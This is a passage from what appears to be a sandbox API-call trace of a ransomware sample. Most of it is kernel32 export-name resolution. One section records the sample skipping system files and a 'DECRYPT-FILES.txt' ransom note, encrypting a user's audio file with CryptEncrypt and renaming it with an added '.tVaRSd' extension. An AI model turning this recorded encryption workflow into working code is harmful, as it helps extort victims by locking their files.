lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0085.443] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0085.443] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0085.443] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0085.443] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0085.443] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0085.443] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0085.443] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0085.443] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0085.443] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0085.443] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0085.444] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0085.444] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\Yz_Genn7GM5k.wav") returned 91 [0085.444] wsprintfW (in: param_1=0x3f2d9ac, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\Yz_Genn7GM5k.wav.tVaRSd") returned 98 [0085.444] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\Yz_Genn7GM5k.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\pnwitrglh_4la7ri\\6fqu\\x7ddbkuwcuhgubop\\yz_genn7gm5k.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\Yz_Genn7GM5k.wav.tVaRSd" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\pnwitrglh_4la7ri\\6fqu\\x7ddbkuwcuhgubop\\yz_genn7gm5k.wav.tvarsd"), dwFlags=0x0) returned 1 [0085.445] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.445] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.445] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.446] FindNextFileW (in: hFindFile=0x5f8b58, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa62648c0, ftCreationTime.dwHighDateTime=0x1d4c6c9, ftLastAccessTime.dwLowDateTime=0xfbfbb0f0, ftLastAccessTime.dwHighDateTime=0x1d4c601, ftLastWriteTime.dwLowDateTime=0xfbfbb0f0, ftLastWriteTime.dwHighDateTime=0x1d4c601, nFileSizeHigh=0x0, nFileSizeLow=0x13e6f, dwReserved0=0x0, dwReserved1=0x0, cFileName="Yz_Genn7GM5k.wav", cAlternateFileName="YZ_GEN~1.WAV")) returned 0 [0085.446] FindClose (in: hFindFile=0x5f8b58 | out: hFindFile=0x5f8b58) returned 1 [0085.446] CloseHandle (hObject=0x438) returned 1 [0085.446] FindNextFileW (in: hFindFile=0x5f8b18, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52ca7f20, ftCreationTime.dwHighDateTime=0x1d4c86d, ftLastAccessTime.dwLowDateTime=0xde60f3e0, ftLastAccessTime.dwHighDateTime=0x1d4c631, ftLastWriteTime.dwLowDateTime=0xde60f3e0, ftLastWriteTime.dwHighDateTime=0x1d4c631, nFileSizeHigh=0x0, nFileSizeLow=0xb56b, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZKZJVYYHO0E7C 9.m4a", cAlternateFileName="ZKZJVY~1.M4A")) returned 1 [0085.446] lstrcmpiW (lpString1="ZKZJVYYHO0E7C 9.m4a", lpString2="DECRYPT-FILES.txt") returned 1 [0085.446] lstrcmpiW (lpString1="ZKZJVYYHO0E7C 9.m4a", lpString2="autorun.inf") returned 1 [0085.446] lstrcmpiW (lpString1="ZKZJVYYHO0E7C 9.m4a", lpString2="boot.ini") returned 1 [0085.446] lstrcmpiW (lpString1="ZKZJVYYHO0E7C 9.m4a", lpString2="desktop.ini") returned 1 [0085.446] lstrcmpiW (lpString1="ZKZJVYYHO0E7C 9.m4a", lpString2="ntuser.dat") returned 1 [0085.446] lstrcmpiW (lpString1="ZKZJVYYHO0E7C 9.m4a", lpString2="iconcache.db") returned 1 [0085.446] lstrcmpiW (lpString1="ZKZJVYYHO0E7C 9.m4a", lpString2="bootsect.bak") returned 1 [0085.446] lstrcmpiW (lpString1="ZKZJVYYHO0E7C 9.m4a", lpString2="ntuser.dat.log") returned 1 [0085.446] lstrcmpiW (lpString1="ZKZJVYYHO0E7C 9.m4a", lpString2="thumbs.db") returned 1 [0085.446] lstrcmpiW (lpString1="ZKZJVYYHO0E7C 9.m4a", lpString2="Bootfont.bin") returned 1 [0085.446] lstrlenW (lpString="ZKZJVYYHO0E7C 9.m4a") returned 19 [0085.446] lstrcmpiW (lpString1="m4a", lpString2="lnk") returned 1 [0085.446] lstrcmpiW (lpString1="m4a", lpString2="exe") returned 1 [0085.446] lstrcmpiW (lpString1="m4a", lpString2="sys") returned -1 [0085.446] lstrcmpiW (lpString1="m4a", lpString2="dll") returned 1 [0085.446] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\") returned 58 [0085.446] lstrlenW (lpString="ZKZJVYYHO0E7C 9.m4a") returned 19 [0085.446] lstrcpyW (in: lpString1=0x3f2e428, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\" [0085.446] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\", lpString2="ZKZJVYYHO0E7C 9.m4a" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\ZKZJVYYHO0E7C 9.m4a") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\ZKZJVYYHO0E7C 9.m4a" [0085.446] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.447] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\ZKZJVYYHO0E7C 9.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\pnwitrglh_4la7ri\\6fqu\\zkzjvyyho0e7c 9.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0085.447] GetFileSizeEx (in: hFile=0x438, lpFileSize=0x3f2dbf0 | out: lpFileSize=0x3f2dbf0*=46443) returned 1 [0085.447] CreateFileMappingW (hFile=0x438, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x43c [0085.447] MapViewOfFile (hFileMappingObject=0x43c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0085.447] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0085.447] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0085.447] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0085.448] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2db58*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2db58*=0x100) returned 1 [0085.448] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0085.449] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.449] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0085.450] CloseHandle (hObject=0x43c) returned 1 [0085.450] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.450] WriteFile (in: hFile=0x438, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2db78, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2db78*=0x108, lpOverlapped=0x0) returned 1 [0085.450] CloseHandle (hObject=0x0) returned 0 [0085.451] CloseHandle (hObject=0x438) returned 1 [0085.451] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.451] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.452] GetTickCount () returned 0x114dd16 [0085.452] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.452] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0085.452] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0085.452] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0085.452] lstrlenA (lpString="kernel32.dll") returned 12 [0085.453] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0085.453] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0085.453] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0085.453] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0085.453] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0085.453] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0085.453] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0085.453] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0085.453] lstrlenA (lpString="ADDATOMA") returned 8 [0085.456] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0085.456] lstrlenA (lpString="ADDATOMW") returned 8 [0085.456] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0085.456] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0085.456] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0085.456] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0085.456] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0085.456] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0085.456] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0085.456] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0085.456] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0085.456] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0085.456] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0085.456] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0085.456] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0085.456] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0085.456] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0085.456] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0085.456] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0085.456] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0085.456] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0085.456] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0085.456] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0085.456] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0085.456] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0085.456] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0085.456] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0085.456] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0085.457] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0085.457] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0085.457] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0085.457] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0085.457] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0085.457] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0085.457] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0085.457] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0085.457] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0085.457] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0085.457] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0085.457] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0085.457] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0085.457] lstrlenA (lpString="BACKUPREAD") returned 10 [0085.457] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0085.457] lstrlenA (lpString="BACKUPSEEK") returned 10 [0085.457] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0085.457] lstrlenA (lpString="BACKUPWRITE") returned 11 [0085.457] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0085.457] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0085.457] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0085.457] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0085.457] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0085.457] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0085.457] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0085.457] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0085.457] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0085.457] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0085.457] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0085.457] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0085.457] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0085.457] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0085.457] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0085.457] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0085.457] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0085.457] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0085.458] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0085.458] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0085.458] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0085.458] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0085.458] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0085.458] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0085.458] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0085.458] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0085.458] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0085.458] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0085.458] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0085.458] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0085.458] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0085.458] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0085.458] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0085.458] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0085.458] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0085.458] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0085.458] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0085.458] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0085.458] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0085.458] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0085.458] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0085.458] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0085.458] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0085.458] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0085.458] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0085.458] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0085.458] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0085.458] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0085.458] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0085.458] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0085.458] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0085.458] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0085.458] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0085.458] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0085.459] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0085.459] lstrlenA (lpString="BEEP") returned 4 [0085.459] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0085.459] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0085.459] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0085.459] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0085.459] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0085.459] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0085.459] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0085.459] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0085.459] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0085.459] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0085.459] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0085.459] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0085.459] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0085.459] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0085.459] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0085.459] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0085.459] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0085.459] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0085.459] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0085.459] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0085.459] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0085.459] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0085.459] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0085.459] lstrlenA (lpString="CANCELIO") returned 8 [0085.459] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0085.459] lstrlenA (lpString="CANCELIOEX") returned 10 [0085.459] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0085.459] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0085.459] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0085.459] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0085.459] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0085.459] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0085.459] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0085.459] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0085.460] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0085.460] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0085.460] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0085.460] lstrlenA (lpString="CHECKELEVATION") returned 14 [0085.460] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0085.460] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 